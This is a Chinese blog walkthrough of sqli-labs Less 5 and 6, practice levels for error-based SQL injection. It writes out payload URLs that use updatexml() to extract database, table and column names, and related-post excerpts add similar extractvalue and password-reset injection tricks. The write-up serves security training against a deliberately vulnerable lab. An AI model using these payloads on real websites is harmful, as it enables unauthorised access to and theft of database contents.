sqli-labs 靶场 less-5、6 第五关和第六关:判断注入点、使用错误函数注入爆库名、updatexml()函数

已于 2024-06-09 15:59:16 修改
阅读量691 收藏 4
点赞数 5
分类专栏: 蓝桥网安日志 文章标签: sql 前端 web安全 安全 css less 计算机网络
于 2024-06-06 11:11:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Superstacks/article/details/139494886
版权 
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 5

SQLI DUMB SERIES-5
判断注入点:
	1. 首先,尝试正常的回显内容,如?id=1。
	2. 接着,输入?id=1'来查看是否出现语句错误。如果出现,那么可能存在单引号的闭合问题。
判断当前表的字段数:
	 使用order by语句来判断当前表的字段数。例如,?id=1' order by 3--和?id=1' order by 4--,通过页面回显的结果来确定字段数。
使用错误函数注入爆库名:
	1. 既然没有直接的回显信息,您可以使用MySQL的updatexml()函数来触发错误并提取信息。updatexml()函数在第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
	2. 尝试使用类似?id=1' and updatexml(1, concat(0x7e, version()), 3)--的语句来提取数据库版本信息。
	3. 逐步构造更复杂的语句来提取其他信息,如数据库名、表名等。

判断注入点

通过测试可知使用单引号会使得系统报语法报错

http://sqli-labs.com/Less-5/
?id=1'

ur SQL syntax; check the manual that corresponds to your MySQL server version f
即使使用注释语句重新获取数据页面中也不回显数据。
u are in......
意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。
updatexml

updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。
语法:updatexml(XML_document,XPath_string,new_value)
XML_document:是string格式,为XML文档对象的名称
XPath_string:代表路径,Xpath格式的字符串例如
new_value:string格式,替换查找到的符合条件的数据
updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)

注入

通过报错注入代码,查看数据库名称:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",database()),3) --+

XPATH syntax erro
获取该数据库的表名:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(table_name) from information_schema.tables where table_schema='security')
),3) --+

ls,referers,u
注入查询users表的列名:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')
),3) --+

sername,p

Less 6

SQLI DUMB SERIES-5
判断注入点:同第五关。
判断当前表的字段数:同第五关。
使用错误函数注入提取信息:同第五关。

判断注入点

输入双引号后报错的响应可知为闭合符号:

http://sqli-labs.com/Less-6/
?id=1"

sqli dump
继续判断字段数量,当数字为3时没报错,得知为3个字段。

http://sqli-labs.com/Less-6/
?id=1" order by 3 --+

e Dhak

注入

输入正确不返回数据,则我们通过错误函数注入获取数据库。

http://sqli-labs.com/Less-6/
?id=1" union select updatexml(1,concat('~',database()),3); --+

sqli dumb
在错误函数注入中输入语句,用于获取该数据库表名

http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(table_name) from information_schema.tables where table_schema=database())
),3); --+

_concat(table_na
注入获取数据表列名。

http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')
),3); --+

tabase()

系列文章

超栈
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labtips 第五~第六
weixin_44089266的博客
04-06 869
** 第五关和第六为报错型sql注入,此处只对第五进行详解** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-5/?id=1 观察到页面回显如下 重新构造payload h...
sqli-labs靶场第五
gou1791241251的博客
12-20 4470
第五与前面几都有所不同,话不多说,我们传入id=1进去看看吧! 此时页面回显信息为you are in… 第一步:判断注入类型,字符型还是数字型 从报错信息不难看出注入类型为字符型,且为单引号闭合 此步证实了单引号闭合 第二步:判断字段数(使用order by) order by 3时页面正常,order by 4时页面异常,说明有三个字段 页面有布尔类型状态,所以用布尔盲注,页面没有回显不能用联合查询,页面没有报错信息不能用报错注入使用length函数判断数据库长度是否为1,由图可
Sqli-labs靶场第5详解[Sqli-labs-less-5]
m0_73615178的博客
02-20 1582
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库字-为后期猜解指定数据库下的表,列做准备-database()sql注入——报错注入(Error-based)
sqli靶场练习第五
weixin_48042647的博客
04-26 984
sqli-labs靶场第五-盲注详解 现在一般情况下,大多数的网站都不会将错误回显出来,这时候我们是不知道有注入,以及得到相信息的。这个时候就需要我们判断是否存在注入,若存在注入那么这时候就需要采取盲注的方式来获得数据。 盲注又分为Boolean盲注和时间型盲注,本要讲的是Boolean盲注。 Boolean盲注是基于真假的判断,它有几种判断方式: 通过长度判断:length():length(database())>=x 通过字符判断:substr():substr(database(),1
sqllab第六笔记
I_WORM的博客
03-13 473
构造payload:id=1"%20and%20extractvalue(1,concat(0x7e,mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,30),0x7e))+--+由于读取的内容小于32位,所以直接全部输出了;成功读取到了数据库的表信息;不是单引号的输入读取。好了,双引号引起的注入。利用错误注入进行数据读取。
sqli-lab第5---第10
qq_54037445的博客
10-06 1870
sqli-lab,get类型,时间盲注,布尔盲注,报错注入,详细讲解
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs靶场
02-12
sqli-labs靶场
sqli-labs系列——第五
茶寂的博客
01-15 2295
less5 更改id后无果,不能用union联合查询 此处用报错注入 报错注入的概念: (1). 通过floor报错 and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符 (2). 通过updatexml报错 and update
sqlilabs靶场记录中级(五)
wanan的博客
10-08 504
sqlilabs靶场记录中级(五)
sqli-labs-报错注入-updatexml报错
weixin_51706044的博客
03-14 1344
文章目录前言一、updatexml报错二、updatexml报错记忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错 今天我在这里先记录一下对于updatexml报错函数的学习 一、updatexml报错 基本格式: ?id=
sqli-labs靶场:1-16
最新发布
2401_83167745的博客
07-29 822
首先搭建好sqli-labs靶场,我这里搭建在了本地上(使用phpstudy)
sqli-labs第六sql注入流程
qq_33598708的博客
03-30 416
正常访问 http://127.0.0.1/sqli-labs-master/Less-6/?id=2 %23 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-6/?id=2" 根据报错可以知道是字符注入使用 " 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重是盲注。 这关和第五相似,只有闭合使用不同,请参考第五注入思路. ...
SQL注入靶场SQLI DUMB SERIES-24通过二次注入重置用户密码
开水的博客
02-21 222
使用已知信息admin/admin登录进去查下题,发现可以修改密码。第三步,进入修改密码界面,随机输入一个旧密码,然后将需要重置的密码。第一步,注册一个新用户:admin’#/123456。,因此注释符#后面的内容都被注释,导致我们不需要知道。第二步,登录刚刚注册的admin’#用户。用户的密码,即可重置。
sql-labs 闯 5~10
qq_44663230的博客
08-14 1584
sql-labs 第5~10 盲注系列
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值